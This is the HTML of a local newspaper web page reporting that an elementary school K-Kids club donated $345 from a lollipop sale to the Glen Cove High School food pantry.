<ul class="sub-menu">
	<li id="menu-item-4679" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-4679"><a href="https://glencoverecordpilot.com/category/library/">Library</a></li>
	<li id="menu-item-4681" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-4681"><a href="https://glencoverecordpilot.com/category/obituaries/">Obituaries</a></li>
</ul>
</li>
<li id="menu-item-5935" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-5935"><a href="http://longislandweekly.com/category/specials/">Specials<i class="td-icon-menu-right td-element-after"></i></a>
<ul class="sub-menu">
	<li id="menu-item-5936" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-5936"><a href="http://longislandweekly.com/category/specials/automotive/">Automotive</a></li>
	<li id="menu-item-5944" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-5944"><a href="http://longislandweekly.com/category/specials/banking-finance/">Banking &#038; Finance</a></li>
	<li id="menu-item-5937" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-5937"><a href="http://longislandweekly.com/category/specials/camps-schools/">Camps &#038; Schools</a></li>
	<li id="menu-item-5938" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-5938"><a href="http://longislandweekly.com/category/specials/education/">Education</a></li>
	<li id="menu-item-5939" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-5939"><a href="http://longislandweekly.com/category/specials/healthy-living">Healthy Living</a></li>
	<li id="menu-item-5940" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-5940"><a href="http://longislandweekly.com/category/specials/asa-house-home/">Home Design</a></li>
	<li id="menu-item-5941" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-5941"><a href="http://longislandweekly.com/category/specials/senior-living/">Senior Living</a></li>
	<li id="menu-item-5942" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-5942"><a href="http://longislandweekly.com/category/specials/vacation-travel/">Vacation &#038; Travel</a></li>
	<li id="menu-item-5943" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-5943"><a href="http://longislandweekly.com/category/specials/wine-dine/">Wine &#038; Dine</a></li>
	<li id="menu-item-7773" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-7773"><a href="https://longislandweekly.com/category/specials/">More</a></li>
</ul>
</li>
<li id="menu-item-6891" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-6891"><a href="https://longislandweekly.com/category/classifieds/">Classifieds</a></li>
<li id="menu-item-9558" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-9558"><a href="https://longislandweekly.com/events/">Events</a></li>
</ul></div>        </div>
    </div>

    <!-- register/login section -->
    </div>    <div class="td-search-background"></div>
<div class="td-search-wrap-mob">
	<div class="td-drop-down-search" aria-labelledby="td-header-search-button">
		<form method="get" class="td-search-form" action="https://glencoverecordpilot.com/">
			<!-- close button -->
			<div class="td-search-close">
				<a href="#"><i class="td-icon-close-mobile"></i></a>
			</div>
			<div role="search" class="td-search-input">
				<span>Search</span>
				<input id="td-header-search-mob" type="text" value="" name="s" autocomplete="off" />
			</div>
		</form>
		<div id="td-aj-search-mob"></div>
	</div>
</div>    
    
    <div id="td-outer-wrap" class="td-theme-wrap">
    
        <!--
Header style 1
-->
<div class="td-header-wrap td-header-style-1">

    <div class="td-header-top-menu-full td-container-wrap  top_menu_space1">
        <div class="td-container td-header-row td-header-top-menu">
            
    <div class="top-bar-style-1">
        
<div class="td-header-sp-top-menu">


	        <div class="td_data_time">
            <div >

                Friday, May 22, 2020
            </div>
        </div>
    <div class="menu-top-container"><ul id="menu-top-menu" class="top-header-menu"><li id="menu-item-4684" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-first td-menu-item td-normal-menu menu-item-4684"><a href="http://antonnews.com">Edition</a>
<ul class="sub-menu">
	<li id="menu-item-6972" class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-6972"><a href="https://longislandweekly.com">Long Island Weekly</a></li>
	<li id="menu-item-6759" class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-6759"><a href="http://farmingdale-observer.com/">Farmingdale</a></li>
	<li id="menu-item-6760" class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-6760"><a href="http://floralparkdispatch.com/">Floral Park</a></li>
	<li id="menu-item-6761" class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-6761"><a href="http://gardencity-life.com/">Garden City</a></li>
	<li id="menu-item-6762" class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-6762"><a href="http://greatneckrecord.com/">Great Neck</a></li>
	<li id="menu-item-6763" class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-6763"><a href="http://hicksvillenews.com/">Hicksville</a></li>
	<li id="menu-item-6764" class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-6764"><a href="http://levittown-tribune.com/">Levittown ∙ Wantagh</a></li>
	<li id="menu-item-6765" class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-6765"><a href="http://manhassetpress.com/">Manhasset</a></li>
	<li id="menu-item-6766" class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-6766"><a href="http://www.massapequaobserver.com/">Massapequa</a></li>
	<li id="menu-item-6767" class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-6767"><a href="http://mineolaamerican.com/">Mineola</a></li>
	<li id="menu-item-6768" class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-6768"><a href="http://newhydeparkillustrated.com/">New Hyde Park</a></li>
	<li id="menu-item-6769" class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-6769"><a href="http://oysterbayenterprisepilot.com/">Oyster Bay</a></li>
	<li id="menu-item-6770" class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-6770"><a href="http://plainviewoldbethpageherald.com/">Plainview ∙ Old Bethpage</a></li>
	<li id="menu-item-6771" class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-6771"><a href="http://portwashington-news.com/">Port Washington</a></li>
	<li id="menu-item-6772" class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-6772"><a href="http://roslyn-news.com/">Roslyn ∙ Greenvale</a></li>
	<li id="menu-item-6773" class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-6773"><a href="http://syossetjerichotribune.com/">Syosset ∙ Jericho</a></li>
</ul>
</li>
<li id="menu-item-7715" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-7715"><a href="https://glencoverecordpilot.com/newsstands/">Newsstands</a></li>
<li id="menu-item-4682" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-4682"><a href="https://glencoverecordpilot.com/advertise/">Advertise</a></li>
<li id="menu-item-4683" class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-4683"><a href="https://antonnews.com/subscription/">Subscribe</a></li>
<li id="menu-item-5546" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-5546"><a href="https://glencoverecordpilot.com/contact-us/">Contact Us</a></li>
<li id="menu-item-4924" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children td-menu-item td-normal-menu menu-item-4924"><a href="https://glencoverecordpilot.com/newspaper-in-education/">Newspaper In Education</a>
<ul class="sub-menu">
	<li id="menu-item-6387" class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-6387"><a href="https://longislandweekly.com/category/newspaper-in-education/">Lesson Plans</a></li>
</ul>
</li>
</ul></div></div>
        <div class="td-header-sp-top-widget">
    
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://www.facebook.com/glencoverecordpilot" title="Facebook">
                <i class="td-icon-font td-icon-facebook"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://plus.google.com/109613629782626116856" title="Google+">
                <i class="td-icon-font td-icon-googleplus"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://twitter.com/RecordPilot" title="Twitter">
                <i class="td-icon-font td-icon-twitter"></i>
            </a>
        </span></div>
    </div>

<!-- LOGIN MODAL -->
        </div>
    </div>

    <div class="td-banner-wrap-full td-logo-wrap-full td-container-wrap ">
        <div class="td-container td-header-row td-header-header">
            <div class="td-header-sp-logo">
                        <a class="td-main-logo" href="https://glencoverecordpilot.com/">
            <img class="td-retina-data" data-retina="https://glencoverecordpilot.com/wp-content/uploads/2016/11/GlenCove-544x180-300x100.jpg" src="https://glencoverecordpilot.com/wp-content/uploads/2016/04/GlenCove_WebLogo.jpg" alt="Glen Cove Record Pilot" title="Glen Cove Record Pilot"/>
            <span class="td-visual-hidden">Glen Cove Record Pilot</span>
        </a>
                </div>
            <div class="td-header-sp-recs">
                <div class="td-header-rec-wrap">
    <div class="td-a-rec td-a-rec-id-header  td_uid_1_5ec841e0ba4fc_rand td_block_template_1"><!-- /33457410/GlenCove_728x90_pgal -->
<div id='div-gpt-ad-1463589647854-3' style='height:90px; width:728px;'>
<script type='text/javascript'>
googletag.cmd.push(function() { googletag.display('div-gpt-ad-1463589647854-1'); });
</script>
</div></div>
</div>            </div>
        </div>
    </div>

    <div class="td-header-menu-wrap-full td-container-wrap ">
        <div class="td-header-menu-wrap td-header-gradient">
            <div class="td-container td-header-row td-header-main-menu">
                <div id="td-header-menu" role="navigation">
    <div id="td-top-mobile-toggle"><a href="#"><i class="td-icon-font td-icon-mobile"></i></a></div>
    <div class="td-main-menu-logo td-logo-in-header">
        		<a class="td-mobile-logo td-sticky-disable" href="https://glencoverecordpilot.com/">
			<img class="td-retina-data" data-retina="https://glencoverecordpilot.com/wp-content/uploads/2016/11/GlenCove280x96.jpg" src="https://glencoverecordpilot.com/wp-content/uploads/2016/11/GlenCove-140x48.jpg" alt="Glen Cove Record Pilot" title="Glen Cove Record Pilot"/>
		</a>
			<a class="td-header-logo td-sticky-disable" href="https://glencoverecordpilot.com/">
			<img class="td-retina-data" data-retina="https://glencoverecordpilot.com/wp-content/uploads/2016/11/GlenCove-544x180-300x100.jpg" src="https://glencoverecordpilot.com/wp-content/uploads/2016/04/GlenCove_WebLogo.jpg" alt="Glen Cove Record Pilot" title="Glen Cove Record Pilot"/>
		</a>
	    </div>
    <div class="menu-main-container"><ul id="menu-main-1" class="sf-menu"><li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-first td-menu-item td-normal-menu menu-item-3350"><a href="https://glencoverecordpilot.com/">Home</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children td-menu-item td-normal-menu menu-item-28"><a href="https://glencoverecordpilot.com/category/glen-cove-news/">Glen Cove News</a>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-7266"><a href="https://glencoverecordpilot.com/category/glen-cove-news/anniversary/">100th Anniversary Edition</a></li>
</ul>
</li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent td-menu-item td-normal-menu menu-item-3355"><a href="https://glencoverecordpilot.com/category/schools-news/">Schools News</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-3353"><a href="https://glencoverecordpilot.com/category/fire-police/">Fire &#038; Police</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-4680"><a href="https://glencoverecordpilot.com/category/sports/">Sports</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children td-menu-item td-normal-menu menu-item-7250"><a href="https://glencoverecordpilot.com/category/opinion/">Opinion</a>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-7251"><a href="https://glencoverecordpilot.com/category/opinion/columns/">Columns</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-7252"><a href="https://glencoverecordpilot.com/category/opinion/editorials/">Editorials</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-7253"><a href="https://glencoverecordpilot.com/category/opinion/letters-to-the-editor/">Letters to the Editor</a></li>
</ul>
</li>
<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children td-menu-item td-normal-menu menu-item-7254"><a href="#">More</a>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-4679"><a href="https://glencoverecordpilot.com/category/library/">Library</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-4681"><a href="https://glencoverecordpilot.com/category/obituaries/">Obituaries</a></li>
</ul>
</li>
<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children td-menu-item td-normal-menu menu-item-5935"><a href="http://longislandweekly.com/category/specials/">Specials</a>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-5936"><a href="http://longislandweekly.com/category/specials/automotive/">Automotive</a></li>
	<li class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-5944"><a href="http://longislandweekly.com/category/specials/banking-finance/">Banking &#038; Finance</a></li>
	<li class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-5937"><a href="http://longislandweekly.com/category/specials/camps-schools/">Camps &#038; Schools</a></li>
	<li class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-5938"><a href="http://longislandweekly.com/category/specials/education/">Education</a></li>
	<li class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-5939"><a href="http://longislandweekly.com/category/specials/healthy-living">Healthy Living</a></li>
	<li class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-5940"><a href="http://longislandweekly.com/category/specials/asa-house-home/">Home Design</a></li>
	<li class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-5941"><a href="http://longislandweekly.com/category/specials/senior-living/">Senior Living</a></li>
	<li class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-5942"><a href="http://longislandweekly.com/category/specials/vacation-travel/">Vacation &#038; Travel</a></li>
	<li class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-5943"><a href="http://longislandweekly.com/category/specials/wine-dine/">Wine &#038; Dine</a></li>
	<li class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-7773"><a href="https://longislandweekly.com/category/specials/">More</a></li>
</ul>
</li>
<li class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-6891"><a href="https://longislandweekly.com/category/classifieds/">Classifieds</a></li>
<li class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-9558"><a href="https://longislandweekly.com/events/">Events</a></li>
</ul></div></div>


<div class="td-search-wrapper">
    <div id="td-top-search">
        <!-- Search -->
        <div class="header-search-wrap">
            <div class="dropdown header-search">
                <a id="td-header-search-button" href="#" role="button" class="dropdown-toggle " data-toggle="dropdown"><i class="td-icon-search"></i></a>
                <a id="td-header-search-button-mob" href="#" role="button" class="dropdown-toggle " data-toggle="dropdown"><i class="td-icon-search"></i></a>
            </div>
        </div>
    </div>
</div>

<div class="header-search-wrap">
	<div class="dropdown header-search">
		<div class="td-drop-down-search" aria-labelledby="td-header-search-button">
			<form method="get" class="td-search-form" action="https://glencoverecordpilot.com/">
				<div role="search" class="td-head-form-search-wrap">
					<input id="td-header-search" type="text" value="" name="s" autocomplete="off" /><input class="wpb_button wpb_btn-inverse btn" type="submit" id="td-header-search-top" value="Search" />
				</div>
			</form>
			<div id="td-aj-search"></div>
		</div>
	</div>
</div>            </div>
        </div>
    </div>

</div><div class="td-main-content-wrap td-container-wrap">

    <div class="td-container td-post-template-default ">
        <div class="td-crumb-container"><div class="entry-crumbs"><span><a title="" class="entry-crumb" href="https://glencoverecordpilot.com/">Home</a></span> <i class="td-icon-right td-bread-sep"></i> <span><a title="View all posts in Schools News" class="entry-crumb" href="https://glencoverecordpilot.com/category/schools-news/">Schools News</a></span> <i class="td-icon-right td-bread-sep td-bred-no-url-last"></i> <span class="td-bred-no-url-last">Connolly K-Kids Donate To HS Food Pantry</span></div></div>

        <div class="td-pb-row">
                                    <div class="td-pb-span8 td-main-content" role="main">
                            <div class="td-ss-main-content">
                                
    <article id="post-9795" class="post-9795 post type-post status-publish format-standard hentry category-featured category-schools-news" itemscope itemtype="https://schema.org/Article">
        <div class="td-post-header">

            <ul class="td-category"><li class="entry-category"><a  href="https://glencoverecordpilot.com/category/schools-news/">Schools News</a></li></ul>
            <header class="td-post-title">
                <h1 class="entry-title">Connolly K-Kids Donate To HS Food Pantry</h1>

                

                <div class="td-module-meta-info">
                    <div class="td-post-author-name"><div class="td-author-by">By</div> <a href="https://glencoverecordpilot.com/author/record-pilot-staff/">Record Pilot Staff</a><div class="td-author-line"> - </div> </div>                    <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2020-05-14T10:42:47+00:00" >May 14, 2020</time></span>                    <div class="td-post-comments"><a href="https://glencoverecordpilot.com/connolly-k-kids-donate-to-hs-food-pantry/#respond"><i class="td-icon-comments"></i>0</a></div>                    <div class="td-post-views"><i class="td-icon-views"></i><span class="td-nr-views-9795">68</span></div>                </div>

            </header>

        </div>

        <div class="td-post-sharing td-post-sharing-top ">
				<div class="td-default-sharing">
		            <a class="td-social-sharing-buttons td-social-facebook" href="https://www.facebook.com/sharer.php?u=https%3A%2F%2Fglencoverecordpilot.com%2Fconnolly-k-kids-donate-to-hs-food-pantry%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="td-icon-facebook"></i><div class="td-social-but-text">Share on Facebook</div></a>
		            <a class="td-social-sharing-buttons td-social-twitter" href="https://twitter.com/intent/tweet?text=Connolly+K-Kids+Donate+To+HS+Food+Pantry&url=https%3A%2F%2Fglencoverecordpilot.com%2Fconnolly-k-kids-donate-to-hs-food-pantry%2F&via=Glen+Cove+Record+Pilot"  ><i class="td-icon-twitter"></i><div class="td-social-but-text">Tweet on Twitter</div></a>
		            <a class="td-social-sharing-buttons td-social-google" href="https://plus.google.com/share?url=https://glencoverecordpilot.com/connolly-k-kids-donate-to-hs-food-pantry/" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="td-icon-googleplus"></i></a>
		            <a class="td-social-sharing-buttons td-social-pinterest" href="https://pinterest.com/pin/create/button/?url=https://glencoverecordpilot.com/connolly-k-kids-donate-to-hs-food-pantry/&amp;media=&description=Connolly+K-Kids+Donate+To+HS+Food+Pantry" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="td-icon-pinterest"></i></a>
		            <a class="td-social-sharing-buttons td-social-whatsapp" href="whatsapp://send?text=Connolly+K-Kids+Donate+To+HS+Food+Pantry%20-%20https%3A%2F%2Fglencoverecordpilot.com%2Fconnolly-k-kids-donate-to-hs-food-pantry%2F" ><i class="td-icon-whatsapp"></i></a>
	            </div></div>

        <div class="td-post-content">

        
        <div class="td-a-rec td-a-rec-id-content_top  td_uid_2_5ec841e0bdbb5_rand td_block_template_1"><!-- /33457410/GlenC_InnerPage_Leader -->
<div id='div-gpt-ad-1463589647854-1' style='height:90px; width:728px;'>
<script type='text/javascript'>
googletag.cmd.push(function() { googletag.display('div-gpt-ad-1463589647854-1'); });
</script>
</div></div><p>&nbsp;</p>
<figure id="attachment_9796" aria-describedby="caption-attachment-9796" style="width: 300px" class="wp-caption aligncenter"><a href="https://glencoverecordpilot.com/wp-content/uploads/2020/05/GC-Connolly-K-Kids.jpg"><img class="wp-image-9796 size-medium" src="https://glencoverecordpilot.com/wp-content/uploads/2020/05/GC-Connolly-K-Kids-300x300.jpg" alt="" width="300" height="300" srcset="https://glencoverecordpilot.com/wp-content/uploads/2020/05/GC-Connolly-K-Kids-300x300.jpg 300w, https://glencoverecordpilot.com/wp-content/uploads/2020/05/GC-Connolly-K-Kids-1024x1024.jpg 1024w, https://glencoverecordpilot.com/wp-content/uploads/2020/05/GC-Connolly-K-Kids-150x150.jpg 150w, https://glencoverecordpilot.com/wp-content/uploads/2020/05/GC-Connolly-K-Kids-768x768.jpg 768w, https://glencoverecordpilot.com/wp-content/uploads/2020/05/GC-Connolly-K-Kids-1536x1536.jpg 1536w, https://glencoverecordpilot.com/wp-content/uploads/2020/05/GC-Connolly-K-Kids-696x696.jpg 696w, https://glencoverecordpilot.com/wp-content/uploads/2020/05/GC-Connolly-K-Kids-1068x1068.jpg 1068w, https://glencoverecordpilot.com/wp-content/uploads/2020/05/GC-Connolly-K-Kids-420x420.jpg 420w, https://glencoverecordpilot.com/wp-content/uploads/2020/05/GC-Connolly-K-Kids-1320x1320.jpg 1320w, https://glencoverecordpilot.com/wp-content/uploads/2020/05/GC-Connolly-K-Kids-24x24.jpg 24w, https://glencoverecordpilot.com/wp-content/uploads/2020/05/GC-Connolly-K-Kids-48x48.jpg 48w, https://glencoverecordpilot.com/wp-content/uploads/2020/05/GC-Connolly-K-Kids-96x96.jpg 96w, https://glencoverecordpilot.com/wp-content/uploads/2020/05/GC-Connolly-K-Kids.jpg 1564w" sizes="(max-width: 300px) 100vw, 300px" /></a><figcaption id="caption-attachment-9796" class="wp-caption-text">Margaret A. Connolly Elementary School’s K-Kids members Lia DiMaggio (left) and Domenica Pipitone (bottom right) created signs to send to the food pantry along with the club’s monetary donation. (Photo courtesy of the Glen Cove City School District)</figcaption></figure>
<p>The Margaret A. Connolly Elementary School K-Kids recently donated $345 to the Glen Cove High School food pantry. The money was raised during the K-Kids annual Valentine’s day lollipop sale and, to ensure that their classmates and Glen Cove community members have the resources they need during this difficult time, they decided to donate the proceeds to the pantry.</p>
<p>The Glen Cove food pantry is open Wednesdays from 10:30 a.m. to 12:30 p.m. for Glen Cove families.</p>
<p>K-Kids is a branch of Kiwanis International that seeks to involve elementary school students in community service activities. The Connolly club is affiliated with the North Shore Kiwanis Club.</p>
<div class="td-a-rec td-a-rec-id-content_bottom  td_uid_3_5ec841e0bdc05_rand td_block_template_1"><div style="text-align:center;"><a href="http://longislandweekly-ny.newsmemory.com/" target="_blank"><img src="https://glencoverecordpilot.com/wp-content/uploads/2019/09/LIW-Digital-Edition.jpg" style="max-width: 600px;margin: 0 auto;"></a></div></div>        </div>


        <footer>
                        
            <div class="td-post-source-tags">
                                            </div>

            <div class="td-post-sharing td-post-sharing-bottom td-with-like"><span class="td-post-share-title">SHARE</span>
            <div class="td-default-sharing">
	            <a class="td-social-sharing-buttons td-social-facebook" href="https://www.facebook.com/sharer.php?u=https%3A%2F%2Fglencoverecordpilot.com%2Fconnolly-k-kids-donate-to-hs-food-pantry%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="td-icon-facebook"></i><div class="td-social-but-text">Facebook</div></a>
	            <a class="td-social-sharing-buttons td-social-twitter" href="https://twitter.com/intent/tweet?text=Connolly+K-Kids+Donate+To+HS+Food+Pantry&url=https%3A%2F%2Fglencoverecordpilot.com%2Fconnolly-k-kids-donate-to-hs-food-pantry%2F&via=Glen+Cove+Record+Pilot"><i class="td-icon-twitter"></i><div class="td-social-but-text">Twitter</div></a>
	            <a class="td-social-sharing-buttons td-social-google" href="https://plus.google.com/share?url=https://glencoverecordpilot.com/connolly-k-kids-donate-to-hs-food-pantry/" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="td-icon-googleplus"></i></a>
	            <a class="td-social-sharing-buttons td-social-pinterest" href="https://pinterest.com/pin/create/button/?url=https://glencoverecordpilot.com/connolly-k-kids-donate-to-hs-food-pantry/&amp;media=&description=Connolly+K-Kids+Donate+To+HS+Food+Pantry" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="td-icon-pinterest"></i></a>
	            <a class="td-social-sharing-buttons td-social-whatsapp" href="whatsapp://send?text=Connolly+K-Kids+Donate+To+HS+Food+Pantry%20-%20https%3A%2F%2Fglencoverecordpilot.com%2Fconnolly-k-kids-donate-to-hs-food-pantry%2F" ><i class="td-icon-whatsapp"></i></a>
            </div><div class="td-classic-sharing"><ul><li class="td-classic-facebook"><iframe frameBorder="0" src="https://www.facebook.com/plugins/like.php?href=https://glencoverecordpilot.com/connolly-k-kids-donate-to-hs-food-pantry/&amp;layout=button_count&amp;show_faces=false&amp;width=105&amp;action=like&amp;colorscheme=light&amp;height=21" style="border:none; overflow:hidden; width:105px; height:21px; background-color:transparent;"></iframe></li><li class="td-classic-twitter"><a href="https://twitter.com/share" class="twitter-share-button" data-url="https://glencoverecordpilot.com/connolly-k-kids-donate-to-hs-food-pantry/" data-text="Connolly K-Kids Donate To HS Food Pantry" data-via="" data-lang="en">tweet</a> <script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src="//platform.twitter.com/widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");</script></li></ul></div></div>            <div class="td-block-row td-post-next-prev"><div class="td-block-span6 td-post-prev-post"><div class="td-post-next-prev-content"><span>Previous article</span><a href="https://glencoverecordpilot.com/sea-cliffs-fiona-shonik-is-winner-of-2020-marguerite-suozzi-music-scholarship/">Sea Cliff’s Fiona Shonik is Winner of 2020 Marguerite Suozzi Music Scholarship</a></div></div><div class="td-next-prev-separator"></div><div class="td-block-span6 td-post-next-post"><div class="td-post-next-prev-content"><span>Next article</span><a href="https://glencoverecordpilot.com/obituaries-week-of-may-13/">Obituaries Week of May 13</a></div></div></div>            <div class="author-box-wrap"><a href="https://glencoverecordpilot.com/author/record-pilot-staff/"><img width="96" height="96" src="https://glencoverecordpilot.com/wp-content/uploads/2016/11/Glen-Cove-152x152-150x150.png" class="avatar avatar-96 photo" alt="" srcset="https://glencoverecordpilot.com/wp-content/uploads/2016/11/Glen-Cove-152x152-150x150.png 150w, https://glencoverecordpilot.com/wp-content/uploads/2016/11/Glen-Cove-152x152.png 152w" sizes="(max-width: 96px) 100vw, 96px" /></a><div class="desc"><div class="td-author-name vcard author"><span class="fn"><a href="https://glencoverecordpilot.com/author/record-pilot-staff/">Record Pilot Staff</a></span></div><div class="td-author-description">The <em>Record Pilot</em> has served the areas of Glen Cove, Sea Cliff, Glen Head, Glenwood Landing and Locust Valley since 1917, acting as a dependable source for local news and community events.</div><div class="td-author-social"></div><div class="clearfix"></div></div></div>	        <span style="display: none;" itemprop="author" itemscope itemtype="https://schema.org/Person"><meta itemprop="name" content="Record Pilot Staff"></span><meta itemprop="datePublished" content="2020-05-14T10:42:47+00:00"><meta itemprop="dateModified" content="2020-05-14T00:45:24-04:00"><meta itemscope itemprop="mainEntityOfPage" itemType="https://schema.org/WebPage" itemid="https://glencoverecordpilot.com/connolly-k-kids-donate-to-hs-food-pantry/"/><span style="display: none;" itemprop="publisher" itemscope itemtype="https://schema.org/Organization"><span style="display: none;" itemprop="logo" itemscope itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="https://glencoverecordpilot.com/wp-content/uploads/2016/04/GlenCove_WebLogo.jpg"></span><meta itemprop="name" content="Glen Cove Record Pilot"></span><meta itemprop="headline " content="Connolly K-Kids Donate To HS Food Pantry"><span style="display: none;" itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="https://glencoverecordpilot.com/wp-content/themes/Newspaper/images/no-thumb/td_meta_replacement.png"><meta itemprop="width" content="1068"><meta itemprop="height" content="580"></span>        </footer>

    </article> <!-- /.post -->

    <div class="td_block_wrap td_block_related_posts td_uid_4_5ec841e0beab1_rand td_with_ajax_pagination td-pb-border-top td_block_template_1"  data-td-block-uid="td_uid_4_5ec841e0beab1" ><script>var block_td_uid_4_5ec841e0beab1 = new tdBlock();
block_td_uid_4_5ec841e0beab1.id = "td_uid_4_5ec841e0beab1";
block_td_uid_4_5ec841e0beab1.atts = '{"limit":3,"sort":"","post_ids":"","tag_slug":"","autors_id":"","installed_post_types":"","category_id":"","category_ids":"","custom_title":"","custom_url":"","show_child_cat":"","sub_cat_ajax":"","ajax_pagination":"next_prev","header_color":"","header_text_color":"","ajax_pagination_infinite_stop":"","td_column_number":3,"td_ajax_preloading":"","td_ajax_filter_type":"td_custom_related","td_ajax_filter_ids":"","td_filter_default_txt":"All","color_preset":"","border_top":"","class":"td_uid_4_5ec841e0beab1_rand","el_class":"","offset":"","css":"","tdc_css":"","tdc_css_class":"td_uid_4_5ec841e0beab1_rand","tdc_css_class_style":"td_uid_4_5ec841e0beab1_rand_style","live_filter":"cur_post_same_categories","live_filter_cur_post_id":9795,"live_filter_cur_post_author":"50","block_template_id":""}';
block_td_uid_4_5ec841e0beab1.td_column_number = "3";
block_td_uid_4_5ec841e0beab1.block_type = "td_block_related_posts";
block_td_uid_4_5ec841e0beab1.post_count = "3";
block_td_uid_4_5ec841e0beab1.found_posts = "948";
block_td_uid_4_5ec841e0beab1.header_color = "";
block_td_uid_4_5ec841e0beab1.ajax_pagination_infinite_stop = "";
block_td_uid_4_5ec841e0beab1.max_num_pages = "316";
tdBlocksArray.push(block_td_uid_4_5ec841e0beab1);
